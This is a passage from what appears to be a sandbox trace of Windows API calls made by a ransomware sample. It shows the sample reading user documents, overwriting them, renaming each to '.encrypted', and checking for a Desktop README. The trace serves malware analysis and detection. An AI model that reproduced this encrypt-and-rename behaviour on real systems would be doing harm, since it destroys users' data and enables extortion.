nBufferLength=0x105, lpBuffer=0x2ee294, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\6wd_KO_eVh.xlsx", lpFilePart=0x0) returned 0x4a [0152.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee788) returned 1 [0152.857] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\6wd_KO_eVh.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\6wd_ko_evh.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.858] GetFileType (hFile=0x4d0) returned 0x1 [0152.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee784) returned 1 [0152.858] GetFileType (hFile=0x4d0) returned 0x1 [0152.858] WriteFile (in: hFile=0x4d0, lpBuffer=0x23e8c10*, nNumberOfBytesToWrite=0x13d00, lpNumberOfBytesWritten=0x2ee844, lpOverlapped=0x0 | out: lpBuffer=0x23e8c10*, lpNumberOfBytesWritten=0x2ee844*=0x13d00, lpOverlapped=0x0) returned 1 [0152.860] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\6wd_KO_eVh.xlsx", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\6wd_KO_eVh.xlsx", lpFilePart=0x0) returned 0x4a [0152.860] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\6wd_KO_eVh.xlsx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\6wd_KO_eVh.xlsx.encrypted", lpFilePart=0x0) returned 0x54 [0152.860] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee82c) returned 1 [0152.860] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\6wd_KO_eVh.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\6wd_ko_evh.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8a8 | out: lpFileInformation=0x2ee8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b7893a0, ftCreationTime.dwHighDateTime=0x1d5e30a, ftLastAccessTime.dwLowDateTime=0x83facaa0, ftLastAccessTime.dwHighDateTime=0x1d5e059, ftLastWriteTime.dwLowDateTime=0x421464e0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x13d00)) returned 1 [0152.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee828) returned 1 [0152.860] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\6wd_KO_eVh.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\6wd_ko_evh.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\6wd_KO_eVh.xlsx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\6wd_ko_evh.xlsx.encrypted")) returned 1 [0152.862] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\EJPgglYGV7ETM.odt", nBufferLength=0x105, lpBuffer=0x2ee2ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\EJPgglYGV7ETM.odt", lpFilePart=0x0) returned 0x4c [0152.862] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0152.863] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\EJPgglYGV7ETM.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\ejpgglygv7etm.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.863] GetFileType (hFile=0x4d0) returned 0x1 [0152.863] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0152.863] GetFileType (hFile=0x4d0) returned 0x1 [0152.863] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8a8 | out: lpFileSizeHigh=0x2ee8a8*=0x0) returned 0xf6de [0152.863] ReadFile (in: hFile=0x4d0, lpBuffer=0x23fced8, nNumberOfBytesToRead=0xf6de, lpNumberOfBytesRead=0x2ee854, lpOverlapped=0x0 | out: lpBuffer=0x23fced8*, lpNumberOfBytesRead=0x2ee854*=0xf6de, lpOverlapped=0x0) returned 1 [0152.880] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee820) returned 1 [0152.880] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee89c | out: lpFileInformation=0x2ee89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee81c) returned 1 [0152.880] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\EJPgglYGV7ETM.odt", nBufferLength=0x105, lpBuffer=0x2ee294, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\EJPgglYGV7ETM.odt", lpFilePart=0x0) returned 0x4c [0152.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee788) returned 1 [0152.880] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\EJPgglYGV7ETM.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\ejpgglygv7etm.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.882] GetFileType (hFile=0x4d0) returned 0x1 [0152.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee784) returned 1 [0152.882] GetFileType (hFile=0x4d0) returned 0x1 [0152.882] WriteFile (in: hFile=0x4d0, lpBuffer=0x247813c*, nNumberOfBytesToWrite=0xf6e0, lpNumberOfBytesWritten=0x2ee844, lpOverlapped=0x0 | out: lpBuffer=0x247813c*, lpNumberOfBytesWritten=0x2ee844*=0xf6e0, lpOverlapped=0x0) returned 1 [0152.884] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\EJPgglYGV7ETM.odt", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\EJPgglYGV7ETM.odt", lpFilePart=0x0) returned 0x4c [0152.884] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\EJPgglYGV7ETM.odt.encrypted", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\EJPgglYGV7ETM.odt.encrypted", lpFilePart=0x0) returned 0x56 [0152.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee82c) returned 1 [0152.884] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\EJPgglYGV7ETM.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\ejpgglygv7etm.odt"), fInfoLevelId=0x0, lpFileInformation=0x2ee8a8 | out: lpFileInformation=0x2ee8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79402150, ftCreationTime.dwHighDateTime=0x1d5e509, ftLastAccessTime.dwLowDateTime=0x10044110, ftLastAccessTime.dwHighDateTime=0x1d5df11, ftLastWriteTime.dwLowDateTime=0x4216c640, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0xf6e0)) returned 1 [0152.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee828) returned 1 [0152.884] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\EJPgglYGV7ETM.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\ejpgglygv7etm.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\EJPgglYGV7ETM.odt.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\ejpgglygv7etm.odt.encrypted")) returned 1 [0152.886] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\HVbg15qz0rsOcBGpiJX.docx", nBufferLength=0x105, lpBuffer=0x2ee2ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\HVbg15qz0rsOcBGpiJX.docx", lpFilePart=0x0) returned 0x53 [0152.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0152.886] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\HVbg15qz0rsOcBGpiJX.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\hvbg15qz0rsocbgpijx.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.886] GetFileType (hFile=0x4d0) returned 0x1 [0152.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0152.886] GetFileType (hFile=0x4d0) returned 0x1 [0152.886] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8a8 | out: lpFileSizeHigh=0x2ee8a8*=0x0) returned 0x1fb7 [0152.886] ReadFile (in: hFile=0x4d0, lpBuffer=0x2487e14, nNumberOfBytesToRead=0x1fb7, lpNumberOfBytesRead=0x2ee854, lpOverlapped=0x0 | out: lpBuffer=0x2487e14*, lpNumberOfBytesRead=0x2ee854*=0x1fb7, lpOverlapped=0x0) returned 1 [0152.929] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee820) returned 1 [0152.929] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee89c | out: lpFileInformation=0x2ee89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee81c) returned 1 [0152.929] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\HVbg15qz0rsOcBGpiJX.docx", nBufferLength=0x105, lpBuffer=0x2ee294, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\HVbg15qz0rsOcBGpiJX.docx", lpFilePart=0x0) returned 0x53 [0152.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee788) returned 1 [0152.929] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\HVbg15qz0rsOcBGpiJX.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\hvbg15qz0rsocbgpijx.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.930] GetFileType (hFile=0x4d0) returned 0x1 [0152.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee784) returned 1 [0152.930] GetFileType (hFile=0x4d0) returned 0x1 [0152.930] WriteFile (in: hFile=0x4d0, lpBuffer=0x22af288*, nNumberOfBytesToWrite=0x1fc0, lpNumberOfBytesWritten=0x2ee844, lpOverlapped=0x0 | out: lpBuffer=0x22af288*, lpNumberOfBytesWritten=0x2ee844*=0x1fc0, lpOverlapped=0x0) returned 1 [0152.931] CloseHandle (hObject=0x4d0) returned 1 [0152.932] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\HVbg15qz0rsOcBGpiJX.docx", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\HVbg15qz0rsOcBGpiJX.docx", lpFilePart=0x0) returned 0x53 [0152.932] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\HVbg15qz0rsOcBGpiJX.docx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\HVbg15qz0rsOcBGpiJX.docx.encrypted", lpFilePart=0x0) returned 0x5d [0152.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee82c) returned 1 [0152.932] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\HVbg15qz0rsOcBGpiJX.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\hvbg15qz0rsocbgpijx.docx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8a8 | out: lpFileInformation=0x2ee8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf837e40, ftCreationTime.dwHighDateTime=0x1d5dc37, ftLastAccessTime.dwLowDateTime=0x298e7610, ftLastAccessTime.dwHighDateTime=0x1d5e02d, ftLastWriteTime.dwLowDateTime=0x421dea60, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x1fc0)) returned 1 [0152.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee828) returned 1 [0152.932] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\HVbg15qz0rsOcBGpiJX.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\hvbg15qz0rsocbgpijx.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\HVbg15qz0rsOcBGpiJX.docx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\hvbg15qz0rsocbgpijx.docx.encrypted")) returned 1 [0152.933] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\i_xGwCQrE1RZ-4P1WI.pdf", nBufferLength=0x105, lpBuffer=0x2ee2ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\i_xGwCQrE1RZ-4P1WI.pdf", lpFilePart=0x0) returned 0x51 [0152.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0152.933] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\i_xGwCQrE1RZ-4P1WI.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\i_xgwcqre1rz-4p1wi.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.935] GetFileType (hFile=0x4d0) returned 0x1 [0152.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0152.935] GetFileType (hFile=0x4d0) returned 0x1 [0152.935] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8a8 | out: lpFileSizeHigh=0x2ee8a8*=0x0) returned 0xddc6 [0152.935] ReadFile (in: hFile=0x4d0, lpBuffer=0x22b1878, nNumberOfBytesToRead=0xddc6, lpNumberOfBytesRead=0x2ee854, lpOverlapped=0x0 | out: lpBuffer=0x22b1878*, lpNumberOfBytesRead=0x2ee854*=0xddc6, lpOverlapped=0x0) returned 1 [0152.937] CloseHandle (hObject=0x4d0) returned 1 [0152.953] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee820) returned 1 [0152.953] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee89c | out: lpFileInformation=0x2ee89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee81c) returned 1 [0152.953] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\i_xGwCQrE1RZ-4P1WI.pdf", nBufferLength=0x105, lpBuffer=0x2ee294, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\i_xGwCQrE1RZ-4P1WI.pdf", lpFilePart=0x0) returned 0x51 [0152.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee788) returned 1 [0152.954] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\i_xGwCQrE1RZ-4P1WI.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\i_xgwcqre1rz-4p1wi.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.955] GetFileType (hFile=0x4d0) returned 0x1 [0152.955] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee784) returned 1 [0152.955] GetFileType (hFile=0x4d0) returned 0x1 [0152.955] WriteFile (in: hFile=0x4d0, lpBuffer=0x2328108*, nNumberOfBytesToWrite=0xddd0, lpNumberOfBytesWritten=0x2ee844, lpOverlapped=0x0 | out: lpBuffer=0x2328108*, lpNumberOfBytesWritten=0x2ee844*=0xddd0, lpOverlapped=0x0) returned 1 [0152.956] CloseHandle (hObject=0x4d0) returned 1 [0152.957] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\i_xGwCQrE1RZ-4P1WI.pdf", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\i_xGwCQrE1RZ-4P1WI.pdf", lpFilePart=0x0) returned 0x51 [0152.957] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\i_xGwCQrE1RZ-4P1WI.pdf.encrypted", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\i_xGwCQrE1RZ-4P1WI.pdf.encrypted", lpFilePart=0x0) returned 0x5b [0152.958] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee82c) returned 1 [0152.958] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\i_xGwCQrE1RZ-4P1WI.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\i_xgwcqre1rz-4p1wi.pdf"), fInfoLevelId=0x0, lpFileInformation=0x2ee8a8 | out: lpFileInformation=0x2ee8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0117ef0, ftCreationTime.dwHighDateTime=0x1d5e059, ftLastAccessTime.dwLowDateTime=0xbfd1d990, ftLastAccessTime.dwHighDateTime=0x1d5dfc5, ftLastWriteTime.dwLowDateTime=0x4222ad20, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0xddd0)) returned 1 [0152.958] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee828) returned 1 [0152.958] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\i_xGwCQrE1RZ-4P1WI.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\i_xgwcqre1rz-4p1wi.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\i_xGwCQrE1RZ-4P1WI.pdf.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\i_xgwcqre1rz-4p1wi.pdf.encrypted")) returned 1 [0152.959] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\m6W H-B k11.ppt", nBufferLength=0x105, lpBuffer=0x2ee2ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\m6W H-B k11.ppt", lpFilePart=0x0) returned 0x4a [0152.959] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0152.959] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\m6W H-B k11.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\m6w h-b k11.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.960] GetFileType (hFile=0x4d0) returned 0x1 [0152.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0152.960] GetFileType (hFile=0x4d0) returned 0x1 [0152.960] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8a8 | out: lpFileSizeHigh=0x2ee8a8*=0x0) returned 0x18317 [0152.960] ReadFile (in: hFile=0x4d0, lpBuffer=0x3d97100, nNumberOfBytesToRead=0x18317, lpNumberOfBytesRead=0x2ee854, lpOverlapped=0x0 | out: lpBuffer=0x3d97100*, lpNumberOfBytesRead=0x2ee854*=0x18317, lpOverlapped=0x0) returned 1 [0152.967] CloseHandle (hObject=0x4d0) returned 1 [0152.987] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee820) returned 1 [0152.987] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee89c | out: lpFileInformation=0x2ee89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee81c) returned 1 [0152.987] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\m6W H-B k11.ppt", nBufferLength=0x105, lpBuffer=0x2ee294, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\m6W H-B k11.ppt", lpFilePart=0x0) returned 0x4a [0152.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee788) returned 1 [0152.987] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\m6W H-B k11.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\m6w h-b k11.ppt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.988] GetFileType (hFile=0x4d0) returned 0x1 [0152.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee784) 